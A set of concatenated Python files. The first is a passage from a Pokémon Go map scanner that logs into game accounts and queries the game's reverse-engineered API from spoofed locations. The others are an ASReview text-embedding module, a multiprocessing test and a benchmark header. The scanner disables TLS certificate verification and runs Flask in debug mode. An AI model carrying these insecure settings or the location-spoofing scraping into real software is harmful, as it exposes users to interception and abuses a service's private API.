COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pok'+u'\xe9'+'mon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = set([])
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId + ':' \
+ str(wild.pokemon.PokemonId)
if hash not in seen:
visible.append(wild)
seen.add(hash)
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokename = pokemonsJSON[str(poke.pokemon.PokemonId)]
if args.ignore:
if pokename.lower() in ignore:
continue
elif args.only:
if pokename.lower() not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
embedding_lstm.py
|
# Copyright 2019 The ASReview Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gzip
import io
import logging
from multiprocessing import cpu_count
from multiprocessing import Process
from multiprocessing import Queue
from pathlib import Path
from urllib.request import urlopen
import time
import numpy as np
from asreview.utils import get_data_home
from asreview.feature_extraction.base import BaseFeatureExtraction
try:
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
except ImportError:
TF_AVAILABLE = False
else:
TF_AVAILABLE = True
def _check_tensorflow():
if not TF_AVAILABLE:
raise ImportError(
"Install tensorflow package (`pip install tensorflow`) to use"
" 'EmbeddingLSTM'.")
class EmbeddingLSTM(BaseFeatureExtraction):
"""Class to create embedding matrices for LSTM models.
Feature extraction method for :class:`asreview.models.LSTMBaseModel` and
:class:`asreview.models.LSTMPoolModel` models.
.. note::
This feature extraction algorithm requires ``tensorflow`` to be
installed. Use ``pip install tensorflow`` or install all optional
ASReview dependencies with ``pip install asreview[all]``
Arguments
---------
loop_sequence: bool
Instead of zeros at the start/end of sequence loop it.
num_words: int
Maximum number of unique words to be processed.
max_sequence_length: int
Maximum length of the sequence. Shorter get struncated.
Longer sequences get either padded with zeros or looped.
padding: str
Which side should be padded [pre/post].
truncating:
Which side should be truncated [pre/post].
n_jobs:
Number of processors used in reading the embedding matrix.
"""
name = "embedding-lstm"
def __init__(self,
*args,
loop_sequence=1,
num_words=20000,
max_sequence_length=1000,
padding='post',
truncating='post',
n_jobs=1,
**kwargs):
"""Initialize the embedding matrix feature extraction."""
super(EmbeddingLSTM, self).__init__(*args, **kwargs)
self.embedding = None
self.num_words = num_words
self.max_sequence_length = max_sequence_length
self.padding = padding
self.truncating = truncating
self.n_jobs = n_jobs
self.loop_sequence = loop_sequence
def transform(self, texts):
_check_tensorflow()
self.X, self.word_index = text_to_features(
texts,
loop_sequence=self.loop_sequence,
num_words=self.num_words,
max_sequence_length=self.max_sequence_length,
padding=self.padding,
truncating=self.truncating)
return self.X
def get_embedding_matrix(self, texts, embedding_fp):
_check_tensorflow()
self.fit_transform(texts)
if embedding_fp is None:
embedding_fp = Path(get_data_home(),
EMBEDDING_EN["name"]).expanduser()
if not embedding_fp.exists():
logging.warning("Warning: will start to download large "
"embedding file in 10 seconds.")
time.sleep(10)
download_embedding()
logging.info("Loading embedding matrix. "
"This can take several minutes.")
embedding = load_embedding(embedding_fp, n_jobs=self.n_jobs)
embedding_matrix = sample_embedding(embedding, self.word_index)
return embedding_matrix
def full_hyper_space(self):
from hyperopt import hp
hyper_space, hyper_choices = super(EmbeddingLSTM,
self).full_hyper_space()
hyper_space.update(
{"fex_loop_sequences": hp.randint("fex_loop_sequences", 2)})
return hyper_space, hyper_choices
EMBEDDING_EN = {
"url":
"https://dl.fbaipublicfiles.com/fasttext/vectors-crawl/cc.en.300.vec.gz", # noqa
"name": 'fasttext.cc.en.300.vec'
}
def loop_sequences(X, max_sequence_length=1000):
# Loop the sequences instead of padding.
for i, old_x in enumerate(X):
nz = max_sequence_length - 1
while nz >= 0 and old_x[nz] == 0:
nz -= 1
# If there are only 0's (no data), continue.
if nz < 0:
continue
nz += 1
new_x = old_x.copy()
j = 1
# Copy the old data to the new matrix.
while nz * j < max_sequence_length:
cp_len = min(nz * (j + 1), max_sequence_length) - nz * j
new_x[nz * j:nz * j + cp_len] = old_x[0:cp_len]
j += 1
X[i] = new_x
return X
def text_to_features(sequences,
loop_sequence=1,
num_words=20000,
max_sequence_length=1000,
padding='post',
truncating='post'):
"""Convert text data into features.
Arguments
---------
sequences: list, numpy.ndarray, pandas.Series
The sequences to convert into features.
num_words: int
See keras Tokenizer
Returns
-------
np.ndarray, dict
The array with features and the dictiory that maps words to values.
"""
# fit on texts
tokenizer = Tokenizer(num_words=num_words)
tokenizer.fit_on_texts(sequences)
# tokenize sequences
tokens = tokenizer.texts_to_sequences(sequences)
# Pad sequences with zeros.
x = pad_sequences(tokens,
maxlen=max_sequence_length,
padding=padding,
truncating=truncating)
if loop_sequence == 1:
x = loop_sequences(x, max_sequence_length)
# word index hack. see issue
# https://github.com/keras-team/keras/issues/8092
word_index = {
e: i
for e, i in tokenizer.word_index.items() if i <= num_words
}
return x, word_index
def _embedding_reader(filename, input_queue, block_size=1000):
""" Process that reads the word embeddings from a file.
Parameters
----------
filename: str
File of trained embedding vectors.
input_queue: Queue
Queue to store jobs in.
block_size: int
Number of lines for each job.
"""
with open(filename, 'r', encoding='utf-8', newline='\n') as f:
# Throw away the first line, since we don't care about the dimensions.
f.readline()
i_line = 0
buffer = []
# Read the embedding file line by line.
for line in f:
i_line += 1
buffer.append(line)
# If the buffer is full, write it to the queue.
if i_line == block_size:
input_queue.put(buffer)
i_line = 0
buffer = []
if i_line > 0:
input_queue.put(buffer)
# Put the string "DONE" in the queue, to ensure that the
# worker processes finish.
input_queue.put("DONE")
def _embedding_worker(input_queue, output_queue, emb_vec_dim, word_index=None):
""" Process that reads the word embeddings from a file.
Parameters
----------
input_queue: Queue
Queue in which the jobs are submitted.
output_queue: Queue
Queue to store the embedding in dictionary form.
emb_vec_dim: int
Dimension of each embedding vector.
word_index: dict
Dictionary of the sample embedding.
"""
bad_input = False
bad_values = {}
while True:
embedding = {}
buffer = input_queue.get()
if buffer == "DONE":
break
for line in buffer:
line = line.rstrip()
values = line.split(' ')
if len(values) != emb_vec_dim + 1:
if not bad_input:
print("Error: bad input in embedding vector.")
bad_input = True
bad_values = values
break
word = values[0]
if word_index is not None and word not in word_index:
continue
coefs = values[1:emb_vec_dim + 1]
# store the results
embedding[word] = np.asarray(coefs, dtype=np.float32)
output_queue.put(embedding)
# We removed the "DONE" from the input queue, so put it back in for
# the other processes.
input_queue.put("DONE")
# Store the results in the output queue
if bad_input:
output_queue.put({"ErrorBadInputValues": bad_values})
output_queue.put("DONE")
def _embedding_aggregator(output_queue, n_worker):
""" Process that aggregates the results of the workers.
This should be the main/original process.
Parameters
----------
output_queue: Queue
This queue is the output queue of the workers.
n_worker: int
The number of worker processes.
Returns
-------
Aggregated embedding dictionary.
"""
embedding = {}
num_done = 0
while num_done < n_worker:
new_embedding = output_queue.get()
if new_embedding == "DONE":
num_done += 1
else:
embedding.update(new_embedding)
return embedding
def download_embedding(url=EMBEDDING_EN['url'],
name=EMBEDDING_EN['name'],
data_home=None):
"""Download word embedding file.
Download word embedding file, unzip the file and save to the
file system.
Parameters
----------
url: str
The URL of the gzipped word embedding file
name: str
The filename of the embedding file.
data_home: str
The location of the ASR datasets.
Default `asreview.utils.get_data_home()`
"""
if data_home is None:
data_home = get_data_home()
out_fp = Path(data_home, name)
logging.info(f'Start downloading: {url}')
r = urlopen(url)
compressed_file = io.BytesIO(r.read())
logging.info(f'Save embedding to {out_fp}')
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(out_fp, 'wb') as out_file:
for line in decompressed_file:
out_file.write(line)
def load_embedding(fp, word_index=None, n_jobs=None):
"""Load embedding matrix from file.
The embedding matrix needs to be stored in the
FastText format.
Parameters
----------
fp: str
File path of the trained embedding vectors.
word_index: dict
Sample word embeddings.
n_jobs: int
Number of processes to parse the embedding (+1 process for reading).
verbose: int
The verbosity. Default 1.
Returns
-------
dict:
The embedding weights stored in a dict with the word as key and
the weights as values.
"""
# Maximum number of jobs in the queue.
queue_size = 500
# Set the number of reader processes to use.
if n_jobs is None:
n_jobs = 1
elif n_jobs == -1:
n_jobs = cpu_count() - 1
input_queue = Queue(queue_size)
output_queue = Queue()
with open(fp, 'r', encoding='utf-8', newline='\n') as f:
n_words, emb_vec_dim = list(map(int, f.readline().split(' ')))
logging.debug(f"Reading {n_words} vectors with {emb_vec_dim} dimensions.")
worker_procs = []
p = Process(target=_embedding_reader, args=(fp, input_queue), daemon=True)
worker_procs.append(p)
for _ in range(n_jobs):
p = Process(target=_embedding_worker,
args=(input_queue, output_queue, emb_vec_dim, word_index),
daemon=True)
worker_procs.append(p)
# Start workers.
for proc in worker_procs:
proc.start()
embedding = _embedding_aggregator(output_queue, n_jobs)
# Merge dictionaries of workers
# Join workers
for proc in worker_procs:
proc.join()
if "ErrorBadInputValues" in embedding:
bad_values = embedding["ErrorBadInputValues"]
raise ValueError(f"Check embedding matrix, bad format: {bad_values}")
logging.debug(f"Found {len(embedding)} word vectors.")
return embedding
def sample_embedding(embedding, word_index):
"""Sample embedding matrix
Parameters
----------
embedding: dict
A dictionary with the words and embedding vectors.
word_index: dict
A word_index like the output of Keras Tokenizer.word_index.
verbose: int
The verbosity. Default 1.
Returns
-------
(np.ndarray, list):
The embedding weights strored in a two dimensional
numpy array and a list with the corresponding words.
"""
n_words, emb_vec_dim = len(word_index), len(next(iter(embedding.values())))
logging.debug(f"Creating matrix with {n_words} vectors "
f"with dimension {emb_vec_dim}.")
# n+1 because 0 is preserved in the tokenizing process.
embedding_matrix = np.zeros((n_words + 1, emb_vec_dim))
for word, i in word_index.items():
coefs = embedding.get(word)
if coefs is not None:
embedding_matrix[i] = coefs
logging.debug(f'Shape of embedding matrix: {embedding_matrix.shape}')
return embedding_matrix
|
multiprocess_test.py
|
from multiprocessing import Process, Lock
from multiprocessing.sharedctypes import Value, Array
from ctypes import Structure, c_double
import numpy as np
import ctypes
class Point(Structure):
_fields_ = [('x', c_double), ('y', c_double)]
# _fields_ = np.array([[1.875,-6.25], [-5.75,2.0], [2.375,9.5]])
def modify(n, x, s, A):
n.value **= 2
x.value **= 2
s.value = s.value.upper()
for a in A:
a.x **= 2
a.y **= 2
if __name__ == '__main__':
lock = Lock()
n = Value('i', 7)
x = Value(c_double, 1.0/3.0, lock=False)
s = Array('c', b'hello world', lock=lock)
arr = np.array([[1.875,-6.25], [-5.75,2.0], [2.375,9.5]])
arr = ((1.875,-6.25), (-5.75,2.0), (2.375,9.5))
arr = np.array(arr)
print(arr.shape)
tup = tuple(map(tuple, arr))
A = Array(Point, tup, lock=lock)
p = Process(target=modify, args=(n, x, s, A))
p.start()
p.join()
print(n.value)
print(x.value)
print(s.value)
print([(a.x, a.y) for a in A])
# # import multiprocessing
# import time
# from multiprocessing import Process, Value, Array
# class A():
# def __init__(self):
# pass
# def f(self,n, a):
# for bb in range(100):
# n.value = 3.1415927 + bb
# time.sleep(.1)
# for i in range(len(a)):
# a[i] = -a[i]
# def run(self):
# self.num = Value('d', 0.0)
# self.arr = Array('i', range(10))
# self.p = Process(target=self.f, args=(self.num, self.arr))
# self.p.start()
# if __name__ == '__main__':
# myA = A()
# myA.run()
# for i in range(10):
# print(myA.num.value)
# print(myA.arr[:])
# time.sleep(1)
# def worker(procnum, return_dict):
# """worker function"""
# time.sleep(procnum)
# print(str(procnum) + " represent!")
# return_dict[procnum] = procnum
# if __name__ == "__main__":
# manager = multiprocessing.Manager()
# return_dict = manager.dict()
# jobs = []
# for i in range(5):
# p = multiprocessing.Process(target=worker, args=(i, return_dict))
# jobs.append(p)
# p.start()
# for proc in jobs:
# proc.join()
# print(return_dict.values())
# # time.sleep(1)
#
# class A(object):
# def __init__(self, *args, **kwargs):
# # do other stuff
# self.starttime = time.time()
# self.time = self.starttime
# self.manager = multiprocessing.Manager()
# self.return_dict = self.manager.dict()
# def do_something(self, i,thetime):
# for i in range(1000):
# thetime = time.time() - self.starttime
# time.sleep(0.01)
# # print('%s * %s = %s' % (i, i, i*i))
# def run(self):
# processes = []
# # for i in range(10):
# thetime = 0
# p = multiprocessing.Process(target=self.do_something, args=(5,thetime))
# p.start()
# # processes.append(p)
# # [x.start() for x in processes]
# if __name__ == '__main__':
# a = A()
# a.run()
# print('post run')
# for i in range(10):
# print(a.time)
# time.sleep(1)
|
graph_digest_benchmark.py
|
#!/usr/bin/env python
'''
This benchmark will produce graph digests for all of the
downloadable ontologies available in Bioportal.
'''
from __future__ import print_function
